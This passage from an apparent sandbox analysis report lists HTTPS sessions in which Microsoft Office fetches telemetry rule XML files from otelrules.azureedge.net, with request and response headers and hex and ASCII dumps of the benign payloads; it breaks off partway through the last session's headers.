                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        139192.168.2.44989613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:15 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1378
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 63eb3078-501e-00a3-48d5-33c0f2000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153715Z-174f7845968l4kp6hC1EWRe884000000058g00000000sg7s
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        140192.168.2.44989813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:15 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1370
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 4e339af6-401e-0016-60d5-3353e0000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153715Z-174f7845968l4kp6hC1EWRe88400000005eg000000004xpw
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        141192.168.2.44989913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:15 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 30997c55-701e-006f-03d5-33afc4000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153715Z-174f7845968px8v7hC1EWR08ng00000005f0000000002q6q
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        142192.168.2.44990013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:15 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1406
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                                                                                                        x-ms-request-id: f7a2637e-001e-0065-23d5-330b73000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153715Z-174f7845968v79b7hC1EWRu01s00000004tg0000000091v1
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        143192.168.2.44990213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:15 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 64875c1d-901e-0067-55d5-33b5cb000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153715Z-174f7845968cpnpfhC1EWR3afc00000004pg00000000nwfh
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        144192.168.2.44990113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:15 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1369
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 8377f4f2-c01e-00a1-16d5-337e4a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153715Z-174f7845968psccphC1EWRuz9s00000005c000000000ds22
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        145192.168.2.44990713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:16 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE54CA33F"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 01112c78-d01e-002b-1ed5-3325fb000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153716Z-174f78459685726chC1EWRsnbg0000000570000000009e49
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        146192.168.2.44990513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:16 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1409
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDFC438CF"
                                                                                                                                                                                                                                                                                        x-ms-request-id: c056ffa7-701e-001e-77d5-33f5e6000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153716Z-174f7845968t42glhC1EWRa36w00000004ug00000000gz8r
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        147192.168.2.44990313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:16 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1377
                                                                                                                                                                                                                                                                                        Connection: close
